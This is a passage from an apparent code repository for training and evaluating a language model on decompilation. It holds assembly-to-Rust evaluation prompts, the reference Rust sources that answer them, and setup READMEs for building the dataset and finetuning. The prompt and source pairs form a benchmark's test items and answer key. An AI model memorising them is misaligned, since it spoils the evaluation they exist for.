LAB_0010b8fc 45 | MOV RDI,qword ptr [RSP + 0x50] 46 | LEA RSI,[0x1450e1] 47 | XOR EAX,EAX 48 | MOV EDX,EAX 49 | CALL str>::to_owned 50 | JMP LAB_0010bb0b 51 | LAB_0010b8fc: 52 | MOV EAX,dword ptr [RSP + 0x88] 53 | MOV dword ptr [RSP + 0x8c],EAX 54 | LEA RDI,[RSP + 0x8c] 55 | CALL core::fmt::ArgumentV1::new_display 56 | MOV qword ptr [RSP + 0x20],RDX 57 | MOV qword ptr [RSP + 0x28],RAX 58 | JMP LAB_0010b923 59 | LAB_0010b923: 60 | MOV RAX,qword ptr [RSP + 0x20] 61 | MOV RCX,qword ptr [RSP + 0x28] 62 | MOV qword ptr [RSP + 0x10],RCX 63 | MOV qword ptr [RSP + 0x18],RAX 64 | MOV byte ptr [RSP + 0x187],0x0 65 | MOV RAX,qword ptr [RSP + 0x80] 66 | MOV qword ptr [RSP + 0x170],RAX 67 | MOVUPS XMM0,xmmword ptr [RSP + 0x70] 68 | MOVAPS xmmword ptr [RSP + 0x160],XMM0 69 | LEA RDI,[RSP + 0x140] 70 | LEA RSI,[RSP + 0x160] 71 | CALL as_core::iter::traits::collect::IntoIterator>::into_iter 72 | JMP LAB_0010b973 73 | LAB_0010b973: 74 | LEA RDI,[RSP + 0x128] 75 | LEA RSI,[RSP + 0x140] 76 | CALL core::iter::traits::iterator::Iterator::collect 77 | JMP LAB_0010b98a 78 | LAB_0010b98a: 79 | LEA RDI,[RSP + 0x110] 80 | LEA RSI,[RSP + 0x128] 81 | CALL source::funcA 82 | JMP LAB_0010b9a1 83 | LAB_0010b9a1: 84 | LEA RDI,[RSP + 0x110] 85 | CALL core::fmt::ArgumentV1::new_display 86 | MOV qword ptr [RSP],RDX 87 | MOV qword ptr [RSP + 0x8],RAX 88 | JMP LAB_0010b9e1 89 | LAB_0010b9e1: 90 | MOV RAX,qword ptr [RSP] 91 | MOV RCX,qword ptr [RSP + 0x8] 92 | MOV RDX,qword ptr [RSP + 0x18] 93 | MOV RSI,qword ptr [RSP + 0x10] 94 | MOV qword ptr [RSP + 0xf0],RSI 95 | MOV qword ptr [RSP + 0xf8],RDX 96 | MOV qword ptr [RSP + 0x100],RCX 97 | MOV qword ptr [RSP + 0x108],RAX 98 | LAB_0010ba14: 99 | LEA RSI,[0x156f18] 100 | LEA RDI,[RSP + 0xc0] 101 | LEA RCX,[RSP + 0xf0] 102 | MOV R8D,0x2 103 | MOV RDX,R8 104 | CALL core::fmt::Arguments::new_v1 105 | JMP LAB_0010ba3b 106 | LAB_0010ba3b: 107 | LEA RDI,[RSP + 0xa8] 108 | LEA RSI,[RSP + 0xc0] 109 | CALL alloc::fmt::format 110 | JMP LAB_0010ba52 111 | LAB_0010ba52: 112 | LEA RDI,[RSP + 0x110] 113 | CALL core::ptr::drop_in_place 114 | LAB_0010ba5f: 115 | JMP LAB_0010ba94 116 | LAB_0010ba94: 117 | MOV RDI,qword ptr [RSP + 0x50] 118 | MOV RAX,qword ptr [RSP + 0xb8] 119 | MOV qword ptr [RSP + 0xa0],RAX 120 | MOVUPS XMM0,xmmword ptr [RSP + 0xa8] 121 | MOVAPS xmmword ptr [RSP + 0x90],XMM0 122 | LAB_0010bab9: 123 | LEA RSI,[RSP + 0x90] 124 | CALL ::to_string 125 | JMP LAB_0010baf0 126 | LAB_0010baf0: 127 | LEA RDI,[RSP + 0x90] 128 | CALL core::ptr::drop_in_place 129 | JMP LAB_0010baff 130 | LAB_0010baff: 131 | TEST byte ptr [RSP + 0x187],0x1 132 | JNZ LAB_0010bb3b 133 | JMP LAB_0010bb1c 134 | LAB_0010bb0b: 135 | JMP LAB_0010baff 136 | LAB_0010bb1c: 137 | MOV RDI,qword ptr [RSP + 0x48] 138 | MOV byte ptr [RSP + 0x187],0x0 139 | CALL core::ptr::drop_in_place 140 | MOV RAX,qword ptr [RSP + 0x58] 141 | ADD RSP,0x198 142 | RET 143 | LAB_0010bb3b: 144 | LEA RDI,[RSP + 0x70] 145 | CALL core::ptr::drop_in_place> 146 | LAB_0010bb45: 147 | JMP LAB_0010bb1c 148 | //end of function funcA 149 | 150 | Reference Table: 151 | Address Data 152 | 00156f18 addr 001450e1 153 | 154 | Generate just the Rust code for the function that produced the above x86 64-bit assembly. The Rust code should only represent the funcA function. The Rust code is idiomatic and uses macros, channels, and functions or data types from standard libraries. -------------------------------------------------------------------------------- /eval/rust_corpus/prompts/braintrust_new_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcB(): 4 | SUB RSP,0x188 5 | MOV qword ptr [RSP + 0x50],RDX 6 | MOV qword ptr [RSP + 0x58],RSI 7 | MOV qword ptr [RSP + 0x60],RDI 8 | MOV qword ptr [RSP + 0x68],RDI 9 | MOV byte ptr [RSP + 0x177],0x0 10 | LEA RDI,[RSP + 0x70] 11 | CALL alloc::vec::Vec::new 12 | LAB_0010cecd: 13 | LEA RDI,[RSP + 0x88] 14 | CALL std::collections::hash::map::HashMap::new 15 | JMP LAB_0010cf01 16 | LAB_0010cf01: 17 | MOV RSI,qword ptr [RSP + 0x50] 18 | MOV RDI,qword ptr [RSP + 0x58] 19 | MOV byte ptr [RSP + 0x177],0x1 20 | LAB_0010cf13: 21 | CALL core::slice::::iter 22 | MOV qword ptr [RSP + 0x40],RDX 23 | MOV qword ptr [RSP + 0x48],RAX 24 | JMP LAB_0010cf4a 25 | LAB_0010cf4a: 26 | MOV RDX,qword ptr [RSP + 0x40] 27 | MOV RSI,qword ptr [RSP + 0x48] 28 | LEA RDI,[RSP + 0xd0] 29 | CALL core::iter::traits::iterator::Iterator::enumerate 30 | JMP LAB_0010cf63 31 | LAB_0010cf63: 32 | LEA RDI,[RSP + 0xb8] 33 | LEA RSI,[RSP + 0xd0] 34 | CALL ::into_iter 35 | JMP LAB_0010cf7a 36 | LAB_0010cf7a: 37 | MOV RAX,qword ptr [RSP + 0xb8] 38 | MOV qword ptr [RSP + 0xe8],RAX 39 | MOV RAX,qword ptr [RSP + 0xc0] 40 | MOV qword ptr [RSP + 0xf0],RAX 41 | MOV RAX,qword ptr [RSP + 0xc8] 42 | MOV qword ptr [RSP + 0xf8],RAX 43 | LAB_0010cfaa: 44 | LEA RDI,[RSP + 0xe8] 45 | CALL as_core::iter::traits::iterator::Iterator>::next 46 | MOV qword ptr [RSP + 0x30],RDX 47 | MOV qword ptr [RSP + 0x38],RAX 48 | JMP LAB_0010cfc3 49 | LAB_0010cfc3: 50 | MOV RAX,qword ptr [RSP + 0x30] 51 | MOV RCX,qword ptr [RSP + 0x38] 52 | MOV qword ptr [RSP + 0x100],RCX 53 | MOV qword ptr [RSP + 0x108],RAX 54 | MOV RDX,qword ptr [RSP + 0x108] 55 | MOV EAX,0x1 56 | XOR ECX,ECX 57 | CMP RDX,0x0 58 | CMOVZ RAX,RCX 59 | CMP RAX,0x0 60 | JNZ LAB_0010d00e 61 | LEA RDI,[RSP + 0x70] 62 | CALL alloc::vec::Vec::len 63 | MOV qword ptr [RSP + 0x28],RAX 64 | JMP LAB_0010d0b6 65 | LAB_0010d00e: 66 | MOV RAX,qword ptr [RSP + 0x100] 67 | MOV qword ptr [RSP + 0x18],RAX 68 | MOV RAX,qword ptr [RSP + 0x108] 69 | MOV qword ptr [RSP + 0x20],RAX 70 | CMP byte ptr [RAX],0x5b 71 | JNZ LAB_0010d03e 72 | MOV RSI,qword ptr [RSP + 0x18] 73 | LEA RDI,[RSP + 0x70] 74 | CALL alloc::vec::Vec::push 75 | JMP LAB_0010d04d 76 | LAB_0010d03e: 77 | MOV RAX,qword ptr [RSP + 0x20] 78 | CMP byte ptr [RAX],0x5d 79 | JZ LAB_0010d04f 80 | JMP LAB_0010cfaa 81 | LAB_0010d04d: 82 | JMP LAB_0010d03e 83 | LAB_0010d04f: 84 | LEA RDI,[RSP + 0x70] 85 | CALL alloc::vec::Vec::pop 86 | MOV qword ptr [RSP + 0x8],RDX 87 | MOV qword ptr [RSP + 0x10],RAX 88 | JMP LAB_0010d065 89 | LAB_0010d065: 90 | MOV RSI,qword ptr [RSP + 0x8] 91 | MOV RDI,qword ptr [RSP + 0x10] 92 | LEA RDX,[0x15ec90] 93 | CALL core::option::Option::unwrap 94 | MOV qword ptr [RSP],RAX 95 | JMP LAB_0010d081 96 | LAB_0010d081: 97 | MOV RDX,qword ptr [RSP] 98 | MOV RSI,qword ptr [RSP + 0x18] 99 | LEA RDI,[RSP + 0x88] 100 | CALL std::collections::hash::map::HashMap::insert 101 | JMP LAB_0010d099 102 | LAB_0010d099: 103 | MOV RDX,qword ptr [RSP + 0x18] 104 | MOV RSI,qword ptr [RSP] 105 | LEA RDI,[RSP + 0x88] 106 | CALL std::collections::hash::map::HashMap::insert 107 | JMP LAB_0010d0b1 108 | LAB_0010d0b1: 109 | JMP LAB_0010cfaa 110 | LAB_0010d0b6: 111 | MOV RAX,qword ptr [RSP + 0x28] 112 | CMP RAX,0x0 113 | SETZ AL 114 | XOR AL,0xff 115 | TEST AL,0x1 116 | JNZ LAB_0010d10f 117 | MOV byte ptr [RSP + 0x177],0x0 118 | MOVUPS XMM0,xmmword ptr [RSP + 0x88] 119 | MOVUPS XMM1,xmmword ptr [RSP + 0x98] 120 | MOVUPS XMM2,xmmword ptr [RSP + 0xa8] 121 | MOVAPS xmmword ptr [RSP + 0x130],XMM2 122 | MOVAPS xmmword ptr [RSP + 0x120],XMM1 123 | MOVAPS xmmword ptr [RSP + 0x110],XMM0 124 | LAB_0010d100: 125 | LEA RDI,[RSP + 0x140] 126 | CALL alloc::vec::Vec::new 127 | JMP LAB_0010d157 128 | LAB_0010d10f: 129 | LEA RDI,[0x14b2a5] 130 | LEA RDX,[0x15eca8] 131 | LEA RAX,[0x108b10] 132 | MOV ESI,0x1e 133 | CALL RAX 134 | JMP LAB_0010d12d 135 | LAB_0010d12d: 136 | UD2 137 | LAB_0010d157: 138 | LEA RDI,[RSP + 0x158] 139 | CALL alloc::vec::Vec::new 140 | JMP LAB_0010d18b 141 | LAB_0010d18b: 142 | MOV RDI,qword ptr [RSP + 0x60] 143 | LEA RSI,[RSP + 0x110] 144 | MOV EDX,0x30 145 | CALL memcpy 146 | MOV RAX,qword ptr [RSP + 0x60] 147 | MOV RCX,qword ptr [RSP + 0x140] 148 | MOV qword ptr [RAX + 0x30],RCX 149 | MOV RCX,qword ptr [RSP + 0x148] 150 | MOV qword ptr [RAX + 0x38],RCX 151 | MOV RCX,qword ptr [RSP + 0x150] 152 | MOV qword ptr [RAX + 0x40],RCX 153 | MOV RCX,qword ptr [RSP + 0x158] 154 | MOV qword ptr [RAX + 0x48],RCX 155 | MOV RCX,qword ptr [RSP + 0x160] 156 | MOV qword ptr [RAX + 0x50],RCX 157 | MOV RCX,qword ptr [RSP + 0x168] 158 | MOV qword ptr [RAX + 0x58],RCX 159 | MOV byte ptr [RAX + 0x60],0x0 160 | MOV byte ptr [RSP + 0x177],0x0 161 | LEA RDI,[RSP + 0x70] 162 | CALL core::ptr::drop_in_place> 163 | MOV RAX,qword ptr [RSP + 0x68] 164 | ADD RSP,0x188 165 | RET 166 | //end of function funcB 167 | 168 | Reference Table: 169 | Address Data 170 | 0015ec90 addr 0014b29c 171 | 0015eca8 addr 0014b29c 172 | 173 | Generate just the Rust code for the function that produced the above x86 64-bit assembly. The Rust code should only represent the funcB function. The Rust code is idiomatic and uses macros, channels, and functions or data types from standard libraries. -------------------------------------------------------------------------------- /eval/rust_corpus/prompts/endeavour_enco_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcC(): 4 | SUB RSP,0x188 5 | MOV qword ptr [RSP + 0xd8],RCX 6 | MOV qword ptr [RSP + 0xd0],RDX 7 | MOV qword ptr [RSP + 0xb8],RSI 8 | MOV qword ptr [RSP + 0xc0],RDI 9 | MOV RAX,RDI 10 | MOV qword ptr [RSP + 0xc8],RAX 11 | CALL alloc::string::String::new 12 | MOV RSI,qword ptr [RSP + 0xd0] 13 | MOV RDX,qword ptr [RSP + 0xd8] 14 | MOV byte ptr [RSP + 0xe7],0x0 15 | LAB_0010e87f: 16 | LEA RDI,[RSP + 0xe8] 17 | CALL alloc::str::::to_ascii_uppercase 18 | JMP LAB_0010e8b6 19 | LAB_0010e8b6: 20 | LEA RDI,[RSP + 0xe8] 21 | CALL ::deref 22 | MOV qword ptr [RSP + 0xa8],RDX 23 | MOV qword ptr [RSP + 0xb0],RAX 24 | JMP LAB_0010e8fa 25 | LAB_0010e8fa: 26 | MOV RSI,qword ptr [RSP + 0xa8] 27 | MOV RDI,qword ptr [RSP + 0xb0] 28 | CALL core::str::::chars 29 | MOV qword ptr [RSP + 0x98],RDX 30 | MOV qword ptr [RSP + 0xa0],RAX 31 | JMP LAB_0010e921 32 | LAB_0010e921: 33 | MOV RSI,qword ptr [RSP + 0x98] 34 | MOV RDI,qword ptr [RSP + 0xa0] 35 | CALL ::into_iter 36 | MOV qword ptr [RSP + 0x88],RDX 37 | MOV qword ptr [RSP + 0x90],RAX 38 | JMP LAB_0010e948 39 | LAB_0010e948: 40 | MOV RAX,qword ptr [RSP + 0x88] 41 | MOV RCX,qword ptr [RSP + 0x90] 42 | MOV qword ptr [RSP + 0x100],RCX 43 | MOV qword ptr [RSP + 0x108],RAX 44 | LAB_0010e968: 45 | LEA RDI,[RSP + 0x100] 46 | CALL ::next 47 | MOV dword ptr [RSP + 0x84],EAX 48 | JMP LAB_0010e97e 49 | LAB_0010e97e: 50 | MOV EAX,dword ptr [RSP + 0x84] 51 | MOV dword ptr [RSP + 0x110],EAX 52 | MOV EAX,0x1 53 | XOR ECX,ECX 54 | CMP dword ptr [RSP + 0x110],0x110000 55 | CMOVZ RAX,RCX 56 | CMP RAX,0x0 57 | JNZ LAB_0010e9ba 58 | LAB_0010e9a8: 59 | LEA RDI,[RSP + 0xe8] 60 | CALL core::ptr::drop_in_place 61 | JMP LAB_0010ecf2 62 | LAB_0010e9ba: 63 | MOV EAX,dword ptr [RSP + 0x110] 64 | MOV dword ptr [RSP + 0x114],EAX 65 | CMP dword ptr [RSP + 0x114],0x20 66 | JNZ LAB_0010e9e9 67 | LAB_0010e9d2: 68 | MOV RDI,qword ptr [RSP + 0xc0] 69 | MOV ESI,0x2f 70 | CALL alloc::string::String::push 71 | JMP LAB_0010ece5 72 | LAB_0010e9e9: 73 | TEST byte ptr [RSP + 0xe7],0x1 74 | JNZ LAB_0010e9ff 75 | LAB_0010e9f3: 76 | CMP dword ptr [RSP + 0x114],0x3f 77 | JZ LAB_0010ea1d 78 | JMP LAB_0010ea34 79 | LAB_0010e9ff: 80 | MOV RDI,qword ptr [RSP + 0xc0] 81 | MOV ESI,0x20 82 | CALL alloc::string::String::push 83 | JMP LAB_0010ea13 84 | LAB_0010ea13: 85 | MOV byte ptr [RSP + 0xe7],0x0 86 | JMP LAB_0010e9f3 87 | LAB_0010ea1d: 88 | MOV RDI,qword ptr [RSP + 0xc0] 89 | MOV ESI,0x3f 90 | CALL alloc::string::String::push 91 | JMP LAB_0010ece0 92 | LAB_0010ea34: 93 | MOV RDI,qword ptr [RSP + 0xb8] 94 | CALL as_core::ops::deref::Deref>::deref 95 | MOV qword ptr [RSP + 0x70],RDX 96 | MOV qword ptr [RSP + 0x78],RAX 97 | JMP LAB_0010ea4d 98 | LAB_0010ea4d: 99 | MOV RSI,qword ptr [RSP + 0x70] 100 | MOV RDI,qword ptr [RSP + 0x78] 101 | CALL core::slice::::iter 102 | MOV qword ptr [RSP + 0x60],RDX 103 | MOV qword ptr [RSP + 0x68],RAX 104 | JMP LAB_0010ea68 105 | LAB_0010ea68: 106 | MOV RAX,qword ptr [RSP + 0x60] 107 | MOV RCX,qword ptr [RSP + 0x68] 108 | MOV qword ptr [RSP + 0x128],RCX 109 | MOV qword ptr [RSP + 0x130],RAX 110 | LEA RAX,[RSP + 0x114] 111 | MOV qword ptr [RSP + 0x138],RAX 112 | MOV RSI,qword ptr [RSP + 0x138] 113 | LEA RDI,[RSP + 0x128] 114 | CALL as_core::iter::traits::iterator::Iterator>::position 115 | MOV qword ptr [RSP + 0x50],RDX 116 | MOV qword ptr [RSP + 0x58],RAX 117 | JMP LAB_0010eab3 118 | LAB_0010eab3: 119 | MOV RAX,qword ptr [RSP + 0x50] 120 | MOV RCX,qword ptr [RSP + 0x58] 121 | MOV qword ptr [RSP + 0x118],RCX 122 | MOV qword ptr [RSP + 0x120],RAX 123 | CMP qword ptr [RSP + 0x118],0x0 124 | JNZ LAB_0010eaef 125 | MOV RDI,qword ptr [RSP + 0xc0] 126 | MOV ESI,0x3f 127 | CALL alloc::string::String::push 128 | JMP LAB_0010ecdb 129 | LAB_0010eaef: 130 | MOV RAX,qword ptr [RSP + 0x120] 131 | MOV qword ptr [RSP + 0x140],RAX 132 | LEA RDI,[RSP + 0x148] 133 | CALL alloc::vec::Vec::new 134 | JMP LAB_0010eb0e 135 | LAB_0010eb0e: 136 | MOV byte ptr [RSP + 0xe7],0x1 137 | LAB_0010eb16: 138 | CMP qword ptr [RSP + 0x140],0x0 139 | JA LAB_0010eb3d 140 | LAB_0010eb21: 141 | LEA RDI,[RSP + 0x148] 142 | CALL as_core::ops::deref::Deref>::deref 143 | MOV qword ptr [RSP + 0x40],RDX 144 | MOV qword ptr [RSP + 0x48],RAX 145 | JMP LAB_0010ebfc 146 | LAB_0010eb3d: 147 | MOV RAX,qword ptr [RSP + 0x140] 148 | AND RAX,0x1 149 | CMP RAX,0x1 150 | JNZ LAB_0010eb63 151 | LEA RDI,[RSP + 0x148] 152 | MOV ESI,0x2e 153 | CALL alloc::vec::Vec::push 154 | JMP LAB_0010ebc2 155 | LAB_0010eb63: 156 | LEA RDI,[RSP + 0x148] 157 | MOV ESI,0x2d 158 | CALL alloc::vec::Vec::push 159 | JMP LAB_0010eb9f 160 | LAB_0010eb9f: 161 | JMP LAB_0010eba1 162 | LAB_0010eba1: 163 | MOV RAX,qword ptr [RSP + 0x140] 164 | MOV RCX,RAX 165 | SUB RCX,0x1 166 | MOV qword ptr [RSP + 0x38],RCX 167 | CMP RAX,0x1 168 | SETC AL 169 | TEST AL,0x1 170 | JNZ LAB_0010ebc6 171 | JMP LAB_0010ebc4 172 | LAB_0010ebc2: 173 | JMP LAB_0010eba1 174 | LAB_0010ebc4: 175 | JMP LAB_0010ebe6 176 | LAB_0010ebc6: 177 | LEA RDI,[0x148430] 178 | LEA RDX,[0x15aeb8] 179 | LEA RAX,[0x108ab0] 180 | MOV ESI,0x21 181 | CALL RAX 182 | JMP LAB_0010ebe4 183 | LAB_0010ebe4: 184 | UD2 185 | LAB_0010ebe6: 186 | MOV RAX,qword ptr [RSP + 0x38] 187 | SHR RAX,0x1 188 | MOV qword ptr [RSP + 0x140],RAX 189 | JMP LAB_0010eb16 190 | LAB_0010ebfc: 191 | MOV RSI,qword ptr [RSP + 0x40] 192 | MOV RDI,qword ptr [RSP + 0x48] 193 | CALL core::slice::::iter 194 | MOV qword ptr [RSP + 0x28],RDX 195 | MOV qword ptr [RSP + 0x30],RAX 196 | JMP LAB_0010ec17 197 | LAB_0010ec17: 198 | MOV RSI,qword ptr [RSP + 0x28] 199 | MOV RDI,qword ptr [RSP + 0x30] 200 | CALL core::iter::traits::iterator::Iterator::rev 201 | MOV qword ptr [RSP + 0x18],RDX 202 | MOV qword ptr [RSP + 0x20],RAX 203 | JMP LAB_0010ec32 204 | LAB_0010ec32: 205 | MOV RSI,qword ptr [RSP + 0x18] 206 | MOV RDI,qword ptr [RSP + 0x20] 207 | CALL ::into_iter 208 | MOV qword ptr [RSP + 0x8],RDX 209 | MOV qword ptr [RSP + 0x10],RAX 210 | JMP LAB_0010ec4d 211 | LAB_0010ec4d: 212 | MOV RAX,qword ptr [RSP + 0x8] 213 | MOV RCX,qword ptr [RSP + 0x10] 214 | MOV qword ptr [RSP + 0x160],RCX 215 | MOV qword ptr [RSP + 0x168],RAX 216 | LAB_0010ec67: 217 | LEA RDI,[RSP + 0x160] 218 | CALL as_core::iter::traits::iterator::Iterator>::next 219 | MOV qword ptr [RSP],RAX 220 | JMP LAB_0010ec7a 221 | LAB_0010ec7a: 222 | MOV RAX,qword ptr [RSP] 223 | MOV qword ptr [RSP + 0x170],RAX 224 | MOV RDX,qword ptr [RSP + 0x170] 225 | MOV EAX,0x1 226 | XOR ECX,ECX 227 | CMP RDX,0x0 228 | CMOVZ RAX,RCX 229 | CMP RAX,0x0 230 | JNZ LAB_0010ecb5 231 | LAB_0010eca3: 232 | LEA RDI,[RSP + 0x148] 233 | CALL core::ptr::drop_in_place> 234 | JMP LAB_0010e968 235 | LAB_0010ecb5: 236 | MOV RDI,qword ptr [RSP + 0xc0] 237 | MOV RAX,qword ptr [RSP + 0x170] 238 | MOV ESI,dword ptr [RAX] 239 | LAB_0010ecc7: 240 | CALL alloc::string::String::push 241 | LAB_0010eccc: 242 | JMP LAB_0010ecce 243 | LAB_0010ecce: 244 | JMP LAB_0010ec67 245 | LAB_0010ecdb: 246 | JMP LAB_0010e968 247 | LAB_0010ece0: 248 | JMP LAB_0010e968 249 | LAB_0010ece5: 250 | MOV byte ptr [RSP + 0xe7],0x0 251 | JMP LAB_0010e968 252 | LAB_0010ecf2: 253 | MOV RAX,qword ptr [RSP + 0xc8] 254 | ADD RSP,0x188 255 | RET 256 | //end of function funcC 257 | 258 | Reference Table: 259 | Address Data 260 | 00148430 ds "attempt to subtract with overflow" 261 | 0015aeb8 addr 00148420 262 | 263 | Generate just the Rust code for the function that produced the above x86 64-bit assembly. The Rust code should only represent the funcC function. The Rust code is idiomatic and uses macros, channels, and functions or data types from standard libraries. -------------------------------------------------------------------------------- /eval/rust_corpus/source/baby_rust_step_2021.rs: -------------------------------------------------------------------------------- 1 | fn step(input: String) -> String { 2 | let mut chars: Vec = input.chars().collect(); 3 | let mut a = chars.pop(); 4 | 5 | match a { 6 | Some(x) => format!("{}{}", x, step(chars.into_iter().collect())).to_string(), 7 | None => "".to_owned() 8 | } 9 | } -------------------------------------------------------------------------------- /eval/rust_corpus/source/braintrust_new_2021.rs: -------------------------------------------------------------------------------- 1 | use std::env; 2 | use std::io::Read; 3 | use std::io::Write; 4 | use std::collections::HashMap; 5 | 6 | struct State { 7 | jt: HashMap, 8 | tl: Vec, 9 | tr: Vec, 10 | tc: u8 11 | } 12 | 13 | impl State { 14 | fn new(code: &[u8]) -> State { 15 | let mut s: Vec = Vec::new(); 16 | let mut m: HashMap = HashMap::new(); 17 | for (i, c) in code.iter().enumerate() { 18 | if *c == 91 {s.push(i);} 19 | if *c == 93 { 20 | let j = s.pop().unwrap(); 21 | m.insert(i, j); 22 | m.insert(j, i); 23 | } 24 | } 25 | 26 | assert!(s.len() == 0); 27 | State { 28 | jt: m, 29 | tl: Vec::new(), 30 | tr: Vec::new(), 31 | tc: 0 32 | } 33 | } 34 | } -------------------------------------------------------------------------------- /eval/rust_corpus/source/endeavour_enco_2021.rs: -------------------------------------------------------------------------------- 1 | use std::env; 2 | use std::io; 3 | 4 | // Encoder and decoder for the Morse alphabet. 5 | // https://en.wikipedia.org/wiki/Morse_code 6 | 7 | const SHRDLU: &'static str = "?ETIANMSURWDKGOHVF?L?PJBXCYZQ??"; 8 | 9 | fn enco(key: &Vec, input: &str) -> String { 10 | let mut result = String::new(); 11 | let mut broken = false; 12 | 13 | for c in input.to_ascii_uppercase().chars() { 14 | if c == ' ' { 15 | result.push('/'); 16 | broken = false; 17 | continue; 18 | } 19 | 20 | if broken { 21 | result.push(' '); 22 | broken = false; 23 | } 24 | 25 | if c == '?' { 26 | result.push('?'); 27 | continue; 28 | } 29 | 30 | match key.iter().position(|&x| x == c) { 31 | None => result.push('?'), 32 | Some(x) => { 33 | let mut i = x; 34 | let mut v: Vec = vec!(); 35 | broken = true; 36 | 37 | while i > 0 { 38 | if i & 1 == 1 { 39 | v.push('.'); 40 | } 41 | else { 42 | v.push('-'); 43 | } 44 | 45 | i = (i - 1) / 2; 46 | } 47 | 48 | for c in v.iter().rev() { 49 | result.push(*c); 50 | } 51 | } 52 | } 53 | } 54 | 55 | return result; 56 | } -------------------------------------------------------------------------------- /eval/rust_corpus/source/parasite_deco_2021.rs: -------------------------------------------------------------------------------- 1 | use std::char; 2 | use std::io; 3 | 4 | use std::collections::HashMap; 5 | use std::iter::Peekable; 6 | 7 | // Encodes and decodes SKATS Hangul. 8 | // https://en.wikipedia.org/wiki/SKATS 9 | // https://en.wikipedia.org/wiki/Korean_language_and_computers#Hangul_Syllables_block 10 | 11 | // Codes for Initial, Medial, and Final jamo. 12 | const I: &'static str = "L?LL?F?B?BB?V?M?W?WW?G?GG?K?P?PP?C?X?Z?O?J"; 13 | const M: &'static str = "E?EU?I?IU?T?TU?S?SU?A?AE?AEU?AU?N?H?HT?HTU?HU?R?D?DU?U"; 14 | const F: &'static str = "?L?LL?LG?F?FP?FJ?B?V?VL?VM?VW?VG?VZ?VO?VJ?M?W?WG?G?GG?K?P?C?X?Z?O?J"; 15 | 16 | fn deco(input: &str) -> String { 17 | let imap: HashMap<&str, usize> = I.split("?").enumerate().map(|(i, v)| (v, i)).collect(); 18 | let mmap: HashMap<&str, usize> = M.split("?").enumerate().map(|(i, v)| (v, i)).collect(); 19 | let fmap: HashMap<&str, usize> = F.split("?").enumerate().map(|(i, v)| (v, i)).collect(); 20 | 21 | let mut result = String::new(); 22 | let uppercase = input.to_ascii_uppercase(); 23 | let mut iter = uppercase.chars().peekable(); 24 | 25 | while iter.peek().is_some() { 26 | let ti = read(&imap, iter.by_ref()); 27 | let tm = read(&mmap, iter.by_ref()); 28 | let tf = read(&fmap, iter.by_ref()); 29 | 30 | match (ti, tm) { 31 | (Some(xi), Some(xm)) => { 32 | let n = 588 * xi + 28 * xm + tf.unwrap_or(0) + 44032; 33 | let c = std::char::from_u32(n as u32); 34 | result.push(c.unwrap()); 35 | } 36 | _ => {} 37 | } 38 | 39 | let _ = iter.by_ref().take_while(|c| *c != ' '); 40 | iter.next(); 41 | 42 | if iter.peek() == Some(&' ') { 43 | result.push(' '); 44 | iter.next(); 45 | } 46 | } 47 | 48 | return result; 49 | } -------------------------------------------------------------------------------- /finetune/README.md: -------------------------------------------------------------------------------- 1 | # Decompilation Dataset Extraction/Finetuning Tools 2 | This folder contains all the code to create the decompilation dataset and finetune a large language model using that data. 3 | ## Dataset 4 | The current version of the dataset can be found here: [Decomp Dataset](https://huggingface.co/datasets/ap0009/decomp_dataset). 5 | ## Finetuning 6 | You can finetune a model using this dataset with the following commands: 7 | ```bash 8 | wget https://huggingface.co/datasets/ap0009/decomp_dataset/resolve/main/decomp_dataset.json 9 | pip3 install axolotl 10 | accelerate launch -m axolotl.cli.train deepseek.yml 11 | ``` 12 | After couple hours of training, you should get a ./qlora.out folder with the finetuned model. 13 | ## extract_*.py 14 | The extract_c.py, extract_cpp.py, extract_go.py, and extract_rust.py are all standalone scripts that use the files from the data folder to extract disassembly and source pairings which will be then stored in an output folder. 15 | The scripts can be ran as follows: 16 | ```bash 17 | python3 extract_*.py 18 | ``` 19 | Please make sure to have the compilers for each language installed (C: clang, CPP: clang++, Go: go, Rust: rustc) and all the data cloned in the right location in the data subfolder. 20 | To create your own custom dataset, you can modify the compiler flags used or the data in the data subfolder. 21 | ## merge.py 22 | This file is a utility script that allows you to combine all the json output files from the extraction tools into one singular json. The tool can be simply invoked by just calling the filename with python. 23 | ## data subfolder 24 | This data subfolder contains the README information on how to collect all the data for the original dataset. All the data sources should be put into this folder for the extraction tools to work properly. 25 | ## deepseek.yml 26 | This file contains the configuration used to finetune deepseek-coder-6.7b-instruct with the decompilation data. This configuration can be modified to customize finetuning. 27 | -------------------------------------------------------------------------------- /finetune/data/README.md: -------------------------------------------------------------------------------- 1 | ## Data Folder 2 | This folder contains all the data used by the extraction tools to construct the decompilation dataset. 3 | For the current dataset, there needs to be three data sources in this folder. 4 | ## Datasources 5 | 1. c-by-example.md 6 | You need to download the file from [here](https://raw.githubusercontent.com/seanvaleo/cbyexample.com/master/README.md) and rename it to c-by-example.md 7 | 2. cppreference folder 8 | You need to download the zip files from [here](https://github.com/PeterFeicht/cppreference-doc/releases/download/v20230810/html-book-20230810.zip) and unzip it to a directory named cppreference. 9 | 3. rust-by-example folder 10 | You need to clone the [rust-by-example repository](https://github.com/rust-lang/rust-by-example/tree/master) to this folder. 11 | ## *_corpus subfolders 12 | These subfolders contain example programs taken from various data sources. There is more information about data sources in the README of each subfolder. 13 | -------------------------------------------------------------------------------- /finetune/data/c_corpus/README.md: -------------------------------------------------------------------------------- 1 | # c_corpus folder 2 | This folder contains many example C programs which are used in the current decompilation dataset. 3 | There are three datasources in the current folder. 4 | ## Sources 5 | 1. https://github.com/examplehub/C 6 | 2. https://github.com/DarrenRainey/C-Examples 7 | 3. https://github.com/gouravthakur39/beginners-C-program-examples 8 | Clone these repositories in this folder for the extraction tools to collect the current dataset. 9 | -------------------------------------------------------------------------------- /finetune/data/cpp_corpus/README.md: -------------------------------------------------------------------------------- 1 | # cpp_corpus folder 2 | This folder contains many example CPP programs which are used in the current decompilation dataset. 3 | There are five data sources in the current folder. 4 | ## Sources 5 | 1. https://github.com/tridibsamanta/CPP_Beginner_to_Expert 6 | 2. https://github.com/sinairv/Cpp-Tutorial-Samples 7 | 3. https://github.com/theWhiteWulfy/legacy_cplusplus 8 | 4. https://github.com/yuchdev/cpp 9 | 5. https://github.com/mrtkp9993/Cpp-Examples 10 | Clone these repositories in this folder for the extraction tools to collect the current dataset. 11 | -------------------------------------------------------------------------------- /finetune/data/go_corpus/README.md: -------------------------------------------------------------------------------- 1 | # go_corpus folder 2 | This folder contains many example Go programs which are used in the current decompilation dataset. 3 